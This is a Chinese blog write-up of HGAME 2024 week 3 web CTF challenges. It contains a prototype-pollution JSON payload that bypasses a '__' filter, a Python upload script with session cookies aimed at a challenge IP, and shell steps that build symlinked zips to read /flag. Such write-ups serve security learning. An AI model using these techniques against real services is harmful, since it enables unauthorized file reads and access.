HGAME2024 WEEK3-WEB

已于 2024-02-22 10:41:58 修改
阅读量1.1k 收藏 22
点赞数 24
文章标签: python
于 2024-02-22 10:40:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/git_clone/article/details/136225143
版权

题目一、WebVPN

考点、原型链污染,__proto__过滤

题目描述、

开题:

app.js审计

 登录的路由/user/login

app.post("/user/login", (req, res) => {
  const { username, password } = req.body;
  if (
    typeof username != "string" ||
    typeof password != "string" ||
    !username ||
    !password
  ) {
    res.status(400);
    res.end("invalid username or password");
    return;
  }
  if (!userStorage[username]) {
    res.status(403);
    res.end("invalid username or password");
    return;
  }
  if (userStorage[username].password !== password) {
    res.status(403);
    res.end("invalid username or password");
    return;
  }
  req.session.username = username;
  res.send("login success");
});

一个登录的校验,由于密码账号都给了,没有什么悬念

路由/user/info

// under development
app.post("/user/info", (req, res) => {
  if (!req.session.username) {
    res.sendStatus(403);
  }
  update(userStorage[req.session.username].info, req.body);
  res.sendStatus(200);
});

 有一个update函数可以更新post方法传递的req.body,往上查找update函数

function update(dst, src) {
  for (key in src) {
    if (key.indexOf("__") != -1) {
      continue;
    }
    if (typeof src[key] == "object" && dst[key] !== undefined) {
      update(dst[key], src[key]);
      continue;
    }
    dst[key] = src[key];
  }
}

第一个if过滤了proto,第二个if就是明显的原型链污染。

相关连接:

Node.js 原型污染攻击的分析与利用 - 先知社区

深入理解JavaScript Prototype污染攻击 - FreeBuf网络安全行业门户

路由/proxy

检验url是否为合法的url,检测是否在strategy中的域名。

var userStorage = {
  username: {
    password: "password",
    info: {
      age: 18,
    },
    strategy: {
      "baidu.com": true,
      "google.com": false,
    },
  },
};

在题目所给的username的信息中只有baidu.com合法

// demo service behind webvpn
app.get("/flag", (req, res) => {
  if (
    req.headers.host != "127.0.0.1:3000" ||
    req.hostname != "127.0.0.1" ||
    req.ip != "127.0.0.1" 
  ) {
    res.sendStatus(400);
    return;
  }
  const data = fs.readFileSync("/flag");
  res.send(data);
});

用get请求访问/flag,要满足ip地址,主机名均为127.0.0.1而且Host要为127.0.0.1:3000

现在就是如何让127.0.0.1:3000变成一个合法的,没错,就是用原型链污染。

在/user/info中利用原型链污染

{
"constructor": {
        "prototype": {
            "127.0.0.1": true
        }
    }
}

下图是我不断试错的结果,均是失败的 

最后成功带出

题目二、Zero Link

考点、文件上传软链接,登录的逻辑漏洞

题目描述

开题:

附件

在ZeroLink\src\internal\database下记录着用户和密码

在ZeroLink\src\internal\controller\user下审计,user.go

发现他的GetUserInfo函数很奇怪

他好像只判断token和username是否在数据库中,或者是否为Admin或者0000,却没有判断是否为空,将两者都设置为空

成功读取账号密码,个人猜测是因为,数据库中第一位就是admin所以默认读取了第一位的信息

登录后是文件上传,但是前端校验是

上网查,发现这个好像linux的火狐、mac电脑上的谷歌和火狐才会解析成这样,

个人电脑上解析成

因为这个是前端校验,bp抓不到包

审计代码ZeroLink\src\internal\controller\file

发现他其实是一个软链接,可以覆盖前面上传的文件,同时他有一个函数ReadSecretFile有点类似文件读取,但是要在secret上写文件的路径,发现原来是写/fake_flag,那么我们把secret文件改成/flag读取真正的文件。

我们用python上传

import requests
def upload_zip_file(file_path, upload_url):
    try:
        with open(file_path, 'rb') as file:
            with requests.Session() as session:
                # 设置会话的 Cookie
                session.cookies['session'] = "MTcwODUxMDcxMnxEWDhFQVFMX2dBQUJFQUVRQUFBbl80QUFBUVp6ZEhKcGJtY01DZ0FJZFhObGNtNWhiV1VHYzNSeWFXNW5EQWNBQlVGa2JXbHV8BTjAhJxSnL9bUmZqhBdCIPwZmoq1jmfwvFKm66qdlV0="  # 设置 session_id,替换为实际的 session_id
                # 发送 POST 请求
                files = {'file': ('file.zip', file, 'application/zip')}
                response = session.post(upload_url, files=files)
                if response.status_code == 200:
                    print("File uploaded successfully.")
                    print("Server response:", response.text)
                else:
                    print(f"Failed to upload file. Status code: {response.status_code}")
                    print("Error message:", response.text)
    except Exception as e:
        print(f"An error occurred: {e}")
def click(url):
    with requests.Session() as session:
        with requests.Session() as session:
            # 设置会话的 Cookie
            session.cookies['session'] = "MTcwODUyMzkzNnxEWDhFQVFMX2dBQUJFQUVRQUFBbl80QUFBUVp6ZEhKcGJtY01DZ0FJZFhObGNtNWhiV1VHYzNSeWFXNW5EQWNBQlVGa2JXbHV86zgsTbR4_Gr9rYbNYRSdct6zteJTzcBVct0gz4oFDc0="  # 设置 session_id,替换为实际的 session_id
            # 发送 GET 请求
            response = session.get(url)
            if response.status_code == 200:
                print(response.text)
            else:
                print("erre",response.text)
if __name__ == "__main__":
    file_path = './she1.zip'  # 替换为要上传的 ZIP 文件的路径
    upload_url = 'http://47.102.184.100:31488/api/upload'  # 替换为接收上传的服务器端 URL
    url='http://47.102.184.100:31488/api/unzip'
    upload_zip_file(file_path,upload_url)
    click(url)

kali软连接的步骤

//创建一个文件夹
mkdir app1

cd app1

//软链接
ln -s /app she

//压缩
zip --symlinks she.zip she

//删除she 软连接,创建app文件夹
rm -rf she
mkdir she

//返回上一级,因为secret处于与app1同级
mv secret app1/she

//secret的内容为/flag

//进入到app1文件夹
zip -r she1.zip ./she

//将she.zip和she1.zip拖到python脚本的同级目录

上传第一个

上传第二个

访问api/secret

题目三、VidarBox【*】

ShusHu丶
关注
  • 24
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
HGAME cdcollector-开源
04-24
这是现有项目cdcollector的mod,用于为拥有过多数据库的人使用phpmysql存储您的HGAMES数据库。
HGAME-week3-web-wp
静仙的博客
02-18 307
web萌新的ctf之旅
HGAME-week4-web-wp
静仙的博客
02-19 4608
文章目录hgame第四周-web1.Markdown Online2.Comment3.FileSystem hgame第四周-web 1.Markdown Online 考点:markdown xss,nodejs vm逃逸,JavaScript语言特性 参考:[HGAME 2022 WEB | Y0ng的博客 (yongsheng.site)](http://www.yongsheng.site/2022/02/17/HGAME 2022 WEB/#more) 以及官方wp和github的payload
HGAME-week2-web-wp
静仙的博客
02-18 3379
web萌新的ctf之旅
hgame-week3-web-wp
www_xuhss_com的博客
02-12 273
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 hgame第三周(web ak) 1.SecurityCenter 先看看hint(**vendor是第三方库和插件放置的文件夹,一般来源于composer的安装) 找到了使用的twig模板,应该是twig模板注入 查博客 依葫芦画瓢http://146.56.223.
HGAME 2024 WEEK2 Web方向题解 全
Jay17的博客
02-14 1735
HGAME 2024 WEEK2 Web方向题解 全
HGAME 2024 WEEK1 Web方向题解 全
Jay17的博客
02-06 1357
HGAME 2024 WEEK1 Web方向题解 全
HGAME 2024 WEEK 1 :web ezHTTP
weixin_74790320的博客
02-07 600
然后提示通过那些东西访问页面,User-Agent: 是构造你浏览器访问信息的,所以复制右边那一串替代就好了。这次主要查漏补缺了知识点伪造ip地址还有:X-Real-IP:这种方式。但是本题这里构造这两个都是没有反应的,就有第三种方式。然后要求我们从本地访问,那就是伪造ip。然后我们就可以得到右边有一长串的东西。我们把它base64解码一下看看。第一想法就是Referer伪造。然后构造伪造的Referer。看到这个就知道是文件头伪造。
hgame-week1-web--Become A Member
qq_57861415的博客
01-13 724
hgame-week1-web--Become A Member
[杭电新生赛]HGAME-week1-web-wp
静仙的博客
02-18 776
web萌新ctf之旅
0hgame:用0h制作的游戏->阅读README
05-01
)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king of the penguins4- Enjoy it. (it is a rule, so if you are not enjoying the ...
hgame:Haskell 游戏引擎
05-30
游戏 Haskell 游戏引擎
3D模型图片查看器(可查看3D程序模型)
11-03
包括很多以前Hgame图片模型查看工具,包括很多.x或者.ars等文件
GLM+vLLM 部署调用
qq_38915354的博客
06-13 1119
vLLM 框架是一个高效的大型语言模型(LLM)推理和部署服务系统
2024 年最新基于 LLOneBot NT 框架搭建 QQ 机器人详细教程(更新中)
唤醒手腕的博客
06-14 564
llonebot(LLOneBot)是一个与OneBot(也称为CQHTTP)协议兼容的机器人框架,它允许开发者使用不同的编程语言(如Python、Go、JavaScript等)编写机器人应用,并与各种支持 OneBot 协议的聊天平台(如QQ、Telegram、Discord等)进行交互。onebot 11 背景。
基于自编码器的心电图信号异常检测(Python)
weixin_39402231的博客
06-17 133
使用的数据集来自PTB心电图数据库,包括14552个心电图记录,包括两类:正常心跳和异常心跳,采样频率为125Hz。
第9章 类
最新发布
我走的每一步都算数
06-17 605
让一个类继承另一个类后,就可以添加区分子类和父类所需的新属性和新方法了。class Car:class ElectricCar(Car): # 继承Carself.battery = 85 # 新属性mycar = ElectricCar(2024, 'Au', 'A7') # 创建实例mycar.prt_battery() # 新方法熟悉Python 提供的选项,这样才能确定哪种组织方式是最佳的,并能理解别人开发的项目。
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加...folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值